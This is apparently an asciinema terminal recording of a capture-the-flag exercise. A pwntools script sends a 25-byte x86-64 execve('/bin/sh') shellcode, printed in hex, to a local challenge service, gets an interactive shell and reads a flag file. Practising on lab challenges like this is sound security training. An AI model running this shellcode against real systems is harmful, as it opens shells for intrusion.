{"version": 2, "width": 120, "height": 30, "timestamp": 1752130632, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.910911, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                       \r \r"]
[0.913328, "o", "\u001b]2;root@chunk-core-1:/mnt/e/Projects/ctf101\u0007\u001b]1;..ojects/ctf101\u0007"]
[0.921133, "o", "\u001b]7;file://chunk-core-1/mnt/e/Projects/ctf101\u001b\\"]
[0.968257, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mctf101\u001b[00m \u001b[K"]
[0.968884, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[1.463664, "o", "asciinema rec pwn1-o5.cast "]
[1.472275, "o", "\u001b[27D\u001b[32ma\u001b[32ms\u001b[32mc\u001b[32mi\u001b[32mi\u001b[32mn\u001b[32me\u001b[32mm\u001b[32ma\u001b[39m\u001b[5C\u001b[4mp\u001b[4mw\u001b[4mn\u001b[4m1\u001b[4m-\u001b[4mo\u001b[4m5\u001b[4m.\u001b[4mc\u001b[4ma\u001b[4ms\u001b[4mt\u001b[24m\u001b[1C"]
[1.606375, "o", "\u001b[27D\u001b[32mp\u001b[32my\u001b[32mt\u001b[32mh\u001b[32mo\u001b[32mn\u001b[32m3\u001b[32m \u001b[32mp\u001b[39mwn1-e\u001b[4mx\u001b[4mp\u001b[4m2\u001b[4m.\u001b[4mp\u001b[4my\u001b[4m \u001b[24m\u001b[24m \u001b[24m \u001b[24m \u001b[24m \u001b[24m \b\b\b\b\b"]
[1.614042, "o", "\u001b[15D\u001b[32m3\u001b[39m\u001b[39m \u001b[39m\u001b[4mp\u001b[4mw\u001b[4mn\u001b[4m1\u001b[4m-\u001b[4me\u001b[5C\u001b[4my\u001b[24m\u001b[24m "]
[2.116123, "o", "\u001b[?1l\u001b>"]
[2.116726, "o", "\u001b[?2004l"]
[2.125431, "o", "\r\r\n"]
[2.1264, "o", "\u001b]2;python3 pwn1-exp2.py\u0007\u001b]1;python3\u0007"]
[2.65415, "o", "[x] Opening connection to 127.0.0.1 on port 5561\r\n"]
[2.654971, "o", "\u001b[A[\u001b[1m\u001b[34m.\u001b[m] \r\n"]
[2.65893, "o", "\u001b[5G\u001b[AOpening connection to 127.0.0.1 on port 5561: Trying 127.0.0.1\r\n"]
[2.660282, "o", "\u001b[5G\u001b[A\u001b[KOpening connection to 127.0.0.1 on port 5561: Done\r\n"]
[2.660973, "o", "\u001b[A[\u001b[1m\u001b[32m+\u001b[m] \r\n"]
[2.661418, "o", "Payload 1 length: 24\r\n"]
[23.827046, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0xf2 bytes:\r\n"]
[23.827337, "o", "    b'Hello there, once you finish the delegate tasks I requested,\\n'\r\n    b'I will give you your flag :)\\n'\r\n"]
[23.827802, "o", "    b'*** DO NOT CHEAT ME, BIG MA IS WATHCING YOU ***\\n'\r\n    b'-----------------------------------------------------------\\n'\r\n"]
[23.828241, "o", "    b'Request-1: give me code that performing ADD\\n'\r\n"]
[23.828708, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x19 bytes:\r\n"]
[23.831812, "o", "    00000000  48 \u001b[34mb8\u001b[m 2f 62  69 6e 2f 73  68 \u001b[31m00\u001b[m 50 54  5f 31 \u001b[34mc0\u001b[m 50  │H\u001b[34m·\u001b[m/b\u001b[34m│\u001b[min/s\u001b[34m│\u001b[mh\u001b[31m·\u001b[mPT\u001b[34m│\u001b[m_1\u001b[34m·\u001b[mP│\r\n    00000010  \u001b[34mb0\u001b[m 3b 54 5a  54 5e \u001b[34m0f\u001b[m \u001b[34m05\u001b[m  \u001b[31m0a\u001b[m                        │\u001b[34m·\u001b[m;TZ\u001b[34m│\u001b[mT^\u001b[34m·\u001b[m\u001b[34m·\u001b[m\u001b[34m│\u001b[m\u001b[31m·\u001b[m│\r\n    00000019\r\n"]
[23.832327, "o", "[\u001b[1m\u001b[34m*\u001b[m] Switching to interactive mode\r\n"]
[23.83801, "o", "\r\n"]
[23.840424, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\u001b[J\u001b[?25l\u001b[?1h\u001b="]
[29.490832, "o", "\u001b[3Gl\u001b[7m \u001b[m\u001b[J"]
[29.806778, "o", "\u001b[3Gls\u001b[7m \u001b[m\u001b[J"]
[29.94998, "o", "\u001b[3G\u001b[Kls\r\n\u001b[J"]
[29.950555, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x3 bytes:\r\n    b'ls\\n'\r\n"]
[29.950941, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\u001b[J"]
[29.963581, "o", "\r\u001b[J[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x30 bytes:\r\n"]
[29.964153, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[29.964591, "o", "\r\u001b[J    b'bin\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[J    b'dev\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[29.964961, "o", "\r\u001b[J    b'flag2\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r"]
[29.965246, "o", "\u001b[J    b'inject_me\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[29.965856, "o", "\r\u001b[J    b'lib\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[29.966392, "o", "\r\u001b[J    b'lib32\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[29.966775, "o", "\r\u001b[J    b'lib64\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[29.967035, "o", "\r\u001b[J    b'libexec\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[29.967818, "o", "\r\u001b[Jbin\r\ndev\r\nflag2\r\ninject_me\r\nlib\r\nlib32\r\nlib64\r\nlibexec\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[31.337162, "o", "\u001b[3Gc\u001b[7m \u001b[m\u001b[J"]
[31.451787, "o", "\u001b[3Gca\u001b[7m \u001b[m\u001b[J"]
[31.688584, "o", "\u001b[3Gcat\u001b[7m \u001b[m\u001b[J"]
[31.835889, "o", "\u001b[3Gcat \u001b[7m \u001b[m\u001b[J"]
[32.923218, "o", "\u001b[3Gcat f\u001b[7m \u001b[m\u001b[J"]
[33.626391, "o", "\u001b[3Gcat fl\u001b[7m \u001b[m\u001b[J"]
[33.796818, "o", "\u001b[3Gcat fla\u001b[7m \u001b[m\u001b[J"]
[33.904332, "o", "\u001b[3Gcat flag\u001b[7m \u001b[m\u001b[J"]
[34.304502, "o", "\u001b[3Gcat flag2\u001b[7m \u001b[m\u001b[J"]
[34.483016, "o", "\u001b[3G\u001b[Kcat flag2\r\n\u001b[J"]
[34.483404, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0xa bytes:\r\n    b'cat flag2\\n'\r\n"]
[34.483911, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\u001b[J"]
[34.497752, "o", "\r\u001b[J[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x10 bytes:\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r"]
[34.498294, "o", "\u001b[J    b'_9E7_All_F1ag5}\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[J_9E7_All_F1ag5}\r\n"]
[34.498637, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[37.067114, "o", "\u001b[3G\u001b[K\r\n\u001b[J"]
[37.067969, "o", "[\u001b[1m\u001b[34m*\u001b[m] Interrupted\r\n"]
[37.082806, "o", "\u001b[?12l\u001b[?25h\u001b[?1l\u001b>"]
[37.083562, "o", "[\u001b[1m\u001b[34m*\u001b[m] Closed connection to 127.0.0.1 port 5561\r\n"]
[37.225982, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                       \r \r"]
[37.228113, "o", "\u001b]2;root@chunk-core-1:/mnt/e/Projects/ctf101\u0007\u001b]1;..ojects/ctf101\u0007"]
[37.23569, "o", "\u001b]7;file://chunk-core-1/mnt/e/Projects/ctf101\u001b\\"]
[37.270566, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mctf101\u001b[00m \u001b[K"]
[37.271214, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[37.880975, "o", "\u001b[?2004l\r\r\n"]
